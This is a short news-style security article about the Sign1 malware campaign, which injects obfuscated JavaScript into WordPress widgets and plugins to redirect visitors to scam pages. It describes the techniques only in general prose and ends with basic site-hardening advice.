Sign1 Malware
A previously unknown malware operation named Sign1 has successfully infiltrated more than 39,000 websites within six months, resulting in visitors being bombarded with unwanted redirects and popup advertisements. The perpetrators of this threat implant the malware into tailored HTML widgets and authentic plugins found on WordPress platforms. Instead of altering the genuine WordPress files, they deploy the unsafe Sign1 scripts to execute their nefarious activities.
Table of Contents
The Sign1 Malware Campaign Has Compromised Nearly 40,000 Sites
Drawing from past WordPress breaches, researchers believe that the Sign1 Malware infiltration likely employs a dual strategy involving brute force assaults and the exploitation of plugin vulnerabilities to breach website defenses. Upon gaining entry, perpetrators commonly utilize WordPress custom HTML widgets or install the seemingly legitimate Simple Custom CSS and JS plugin to embed malevolent JavaScript code.
Examination of Sign1 has unveiled its utilization of time-based randomization for generating dynamic URLs, altering every 10 minutes to thwart detection. The domains are registered shortly prior to utilization in attacks, ensuring they remain absent from blocklists. These URLs serve to procure additional malicious scripts executed within visitors' browsers.
Initially hosted on Namecheap, the assailants migrated operations to HETZNER for hosting and Cloudflare for IP address concealment.
The Sign1 Malware Takes Victims to Dubious and Unsafe Sites
The Sign1 Malware injects code featuring XOR encoding and utilizes seemingly random variable names, thereby complicating detection for security tools.
This malevolent code conducts checks for specific referrers and cookies before activation, primarily targeting visitors from prominent platforms such as Google, Facebook, Yahoo and Instagram, while lying dormant in other instances. Moreover, the code establishes a cookie on the visitor's browser, ensuring that the popup appears only once per visitor, thus reducing the likelihood of reports being filed by the compromised website owner.
Subsequently, the script redirects visitors to fraudulent sites, such as counterfeit captchas, designed to deceive users into enabling browser notifications. These notifications then inundate the operating system desktop with unwanted advertisements.
Experts caution that Sign1 has undergone a notable evolution over the documented six months of the campaign, with infections peaking upon the release of new versions of the malware.
The Sign1 Malware Has Become More Difficult to Stop
The Sign1 Malware has been detected on over 39,000 websites, while the latest attack wave, which has been underway since January 2024, claimed 2,500 sites. The campaign has evolved over time to become stealthier and more resilient to blocks, which is a worrying development.
To protect their sites against the attack campaigns, companies are advised to use a strong/long administrator password and update their plugins to the latest version. Also, unnecessary add-ons should be removed, which can act as a potential attack surface.
